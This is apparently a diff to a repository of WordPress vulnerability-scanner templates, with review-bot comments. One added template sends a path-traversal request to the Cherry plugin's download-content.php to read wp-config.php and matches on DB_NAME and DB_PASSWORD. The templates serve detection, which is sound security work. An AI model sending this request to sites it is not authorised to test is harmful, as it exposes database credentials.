diff --git a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
index 5811edcd94..ddc524d0fc 100644
--- a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
+++ b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
@@ -1,9 +1,10 @@
id: brandfolder-open-redirect
info:
- name: Wordpress brandfolder plugin Open Redirect
+ name: WordPress Brandfolder Plugin Open Redirect
author: 0x_Akoko
severity: low
+ description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
reference: https://www.exploit-db.com/exploits/39591
tags: wordpress,wp-plugin,lfi,rfi
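Review bot: the `tags` line on the unchanged context line still reads `lfi,rfi` for what the `name` and new description both call an open redirect; the sibling `attitude-theme-open-redirect.yaml` uses `redirect`, so this should be `wordpress,wp-plugin,redirect`. The description is otherwise fine.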
diff --git a/vulnerabilities/wordpress/cherry-file-download.yaml b/vulnerabilities/wordpress/cherry-file-download.yaml
new file mode 100644
index 0000000000..3597e4d780
--- /dev/null
+++ b/vulnerabilities/wordpress/cherry-file-download.yaml
@@ -0,0 +1,29 @@
+id: cherry-file-download
+
+info:
+ name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download
+ author: 0x_Akoko
+ severity: high
+ description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
+ reference:
+ - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
+ - https://github.com/CherryFramework/cherry-plugin
+ tags: wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
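Review bot: the description covers both upload and download, but the template only exercises the download path, and the `name` states "< 1.2.7" while nothing in the template checks a version; state the fixed version in the description so the name's claim is backed up. Since the request pulls `wp-config.php`, the matched body lands in scanner output with live database credentials; the `DB_NAME` match alone is enough to confirm the issue, so consider not echoing the full response in results.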
diff --git a/vulnerabilities/wordpress/issuu-panel-lfi.yaml b/vulnerabilities/wordpress/issuu-panel-lfi.yaml
index 079a043e95..d2ecd930f2 100644
--- a/vulnerabilities/wordpress/issuu-panel-lfi.yaml
+++ b/vulnerabilities/wordpress/issuu-panel-lfi.yaml
@@ -4,6 +4,7 @@ info:
name: Wordpress Plugin Issuu Panel - RFI & LFI
author: 0x_Akoko
severity: high
+ description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files.
reference: https://cxsecurity.com/issue/WLB-2016030131
tags: wp-plugin,wordpress,lfi,rfi